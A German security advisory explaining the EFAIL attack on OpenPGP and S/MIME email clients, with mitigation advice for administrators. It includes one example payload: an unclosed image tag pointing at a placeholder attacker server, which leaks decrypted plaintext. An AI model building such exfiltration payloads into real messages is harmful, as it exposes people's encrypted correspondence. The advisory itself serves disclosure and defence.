@dfncert@infosec.exchangeEFAIL
Neue Schwachstelle mit Logo, Name und Webseite: wie man verschlüsselte Emails liest, ohne die Verschlüsselung zu brechen.
Forschern der Ruhr-Universität Bochum (RUB), der FH Münster und der KU Leuven ist es gelungen, den Inhalt verschlüsselter Emails im Klartext auf einen fremden Webserver zu senden und auf diese Weise auszuspähen. Die von den Forschern auf den Namen EFAIL getaufte Schwachstelle (CVE-2017-17688: OpenPGP, CVE-2017-17689: S/MIME) nutzt dabei aus, dass verschlüsselte Emails manipuliert werden können, ohne dass der Klartext der Nachricht davon betroffen ist. Dass eine Manipulation erfolgt ist, lässt sich allerdings erkennen.
Der Angriff
Der Angriff besteht darin, dass an den Anfang einer abgefangenen und verschlüsselten Mail ein Block mit einer nicht geschlossenen HTTP-Anfrage eingeschleust wird. Dies kann beispielsweise ein HTML-IMG-Tag sein, über den externe Inhalte in Emails eingebracht werden können (diese Technik wird häufig in Newslettern verwendet). Der Angreifer wählt den eingeschleusten HTML-IMG-Tag (<img src="http://SERVER/BILD"/>) nun so, dass die Anführungszeichen in der verschlüsselten Mail enthaltene Cipher-Blöcke einschließen. Dadurch wird der Klartext der Nachricht als Teil eines HTTP-Requests an den Server des Angreifers gesendet, sobald die vorab manipulierte Email vom Anwender in seinem Client entschlüsselt und betrachtet wird. Der entschlüsselte Nachrichteninhalt kann prinzipiell über alle Kanäle, die der Client zur Informationsbeschaffung und für die Darstellung von Emails verwendet (DNS, OCSP, JavaScript, ..) übertragen werden.
Keine Schwachstelle in PGP oder S/MIME?
Die Schwachstelle besteht also nicht in der PGP- und S/MIME-Kryptographie selbst, die weiterhin als sicher angesehen wird. Die Sicherheitsforscher beanstanden allerdings, dass im OpenPGP-Standard Manipulationen am Ciphertext zwar als Sicherheitsproblem angesehen werden, es aber keine Vorschriften zum Umgang mit diesem Problem gibt. Im S/MIME-Standard seien keine effektiven Sicherheitsmaßnahmen gegen den beschriebenen Angriff vorgesehen. Direkt betroffen sind Clients, die PGP und S/MIME umsetzen, weil diese die kryptographischen Betriebsmodi Cipher Block Chaining (CBC) und Cipher Feedback (CFB) einsetzen. Die Schwachstelle kann nur dann ausgenutzt werden, wenn die Clients für die automatische Entschlüsselung konfiguriert sind und aktive Email-Inhalte wie externe Bilder automatisch geladen werden. Zusätzlich müssen die Emails vom Angreifer manipuliert werden, bevor sie im Client entschlüsselt werden.
Die Diskussion dauert an
Über die Webseite der Sicherheitsforscher steht eine Vorabversion der wissenschaftlichen Veröffentlichung zum Thema mit dem Titel 'Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels' zum Download zur Verfügung. Mittlerweile haben sich auch Entwickler von in der Veröffentlichung genannten Software (Enigmail, GnuGP, ..) zu Wort gemeldet und beanstanden vor allem die Wortwahl der Forscher, die EFAIL als Schwachstelle in PGP und S/MIME selbst positioniert wissen wollen. Das ist nach Lage der Dinge nicht der Fall. Die Forscher werden ihre Arbeit am Freitag, 18.05.2018 auf der RuhrSec 2018 einem kritischen Publikum präsentieren.
Empfehlungen
Falls Sie aktive Inhalte in verschlüsselten Mails nach der automatischen Entschlüsselung automatisch nachladen lassen, sind Clients unter Ihrer Kontrolle vermutlich angreifbar: deaktivieren Sie die automatische Entschlüsselung von Emails und das automatische Laden aktiver Inhalte und halten Sie Clients auf dem aktuellen Sicherheitsstand. Schränken Sie generell den Zugriff auf Email-Konten und -Server bestmöglich ein und reagieren Sie auf Berichte zu kompromittierten Email-Benutzeraccounts. Der komplette Verzicht auf die genannten Verschlüsselungstechniken wird ausdrücklich nicht empfohlen.
